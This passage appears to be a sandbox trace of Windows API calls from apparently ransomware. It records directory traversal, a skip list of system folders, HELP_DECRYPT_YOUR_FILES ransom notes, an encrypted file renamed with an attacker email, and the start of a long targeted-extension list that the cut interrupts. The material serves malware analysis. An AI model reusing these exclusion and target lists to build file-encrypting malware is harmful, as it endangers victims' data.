	[0174.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="program files") returned 0x0
	[0174.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.038] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.038] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="appdata") returned 0x0
	[0174.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="application data") returned 0x0
	[0174.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.039] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="winnt") returned 0x0
	[0174.039] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="tmp") returned 0x0
	[0174.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="cache") returned 0x0
	[0174.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.040] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.040] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="webcache") returned 0x0
	[0174.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.041] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="inetcache") returned 0x0
	[0174.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.041] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="nvidia") returned 0x0
	[0174.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.041] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="packages") returned 0x0
	[0174.041] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.042] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="cookies") returned 0x0
	[0174.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.042] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime\\*.*", lpSrch="programdata") returned 0x0
	[0174.042] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0174.042] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0174.042] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x8141127e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="..", cAlternateFileName="")) returned 1
	[0174.042] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0174.042] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8141127e, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8141127e, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8143728e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0174.043] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x813eb495, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x813eb495, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8141127e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0174.043] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1
	[0174.043] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19da08f, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa19da08f, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1a002fa, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1bae, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 0
	[0174.043] FindClose (in: hFindFile=0xfb94b0 | out: hFindFile=0xfb94b0) returned 1
	[0174.043] FindClose (in: hFindFile=0xfb94b0 | out: hFindFile=0xfb94b0) returned 0
	[0174.044] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8130628c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8130628c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8130628c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 1
	[0174.044] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8130628c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8130628c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8130628c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x160, dwReserved0=0x350035, dwReserved1=0x7d0065, cFileName="runtime.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="RUNTIM~1.SCL")) returned 0
	[0174.050] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0174.050] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0174.050] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbcdea603, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcdea603, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcdea603, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0174.051] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0174.051] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0174.051] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", cAlternateFileName="{9DF6A~1")) returned 1
	[0174.051] lstrcmpW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="..") returned 1
	[0174.051] lstrcmpW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2=".") returned 1
	[0174.052] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning") returned="C:\\Users\\All Users\\Microsoft\\Provisioning"
	[0174.052] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\"
	[0174.052] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\", lpString2="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}"
	[0174.052] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}"
	[0174.052] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\"
	[0174.052] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\"
	[0174.052] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*"
	[0174.052] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0174.058] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*") returned 84
	[0174.058] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.059] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", cchLength=0x54 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*") returned 0x54
	[0174.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.059] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="windows") returned 0x0
	[0174.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.059] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="boot") returned 0x0
	[0174.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="system volume information") returned 0x0
	[0174.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0174.060] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.060] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="temp") returned 0x0
	[0174.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="program files") returned 0x0
	[0174.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0174.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="appdata") returned 0x0
	[0174.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="application data") returned 0x0
	[0174.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="winnt") returned 0x0
	[0174.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="tmp") returned 0x0
	[0174.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.062] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="cache") returned 0x0
	[0174.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.063] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0174.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.063] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="webcache") returned 0x0
	[0174.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.063] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="inetcache") returned 0x0
	[0174.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.063] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="nvidia") returned 0x0
	[0174.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.064] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="packages") returned 0x0
	[0174.064] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.064] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="cookies") returned 0x0
	[0174.064] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.064] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpSrch="programdata") returned 0x0
	[0174.064] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd6b510c, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd6b510c, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd6b510c, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0174.064] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa140a197, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa140a197, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa140a197, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0xd1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1
	[0174.065] lstrcmpW (lpString1="customizations.xml", lpString2="..") returned 1
	[0174.065] lstrcmpW (lpString1="customizations.xml", lpString2=".") returned 1
	[0174.065] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\"
	[0174.065] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\", lpString2="customizations.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"
	[0174.065] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned 99
	[0174.065] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0174.065] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned 0x63
	[0174.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.065] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0174.066] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"
	[0174.066] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned 99
	[0174.066] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0174.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.066] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0174.066] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0174.067] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.w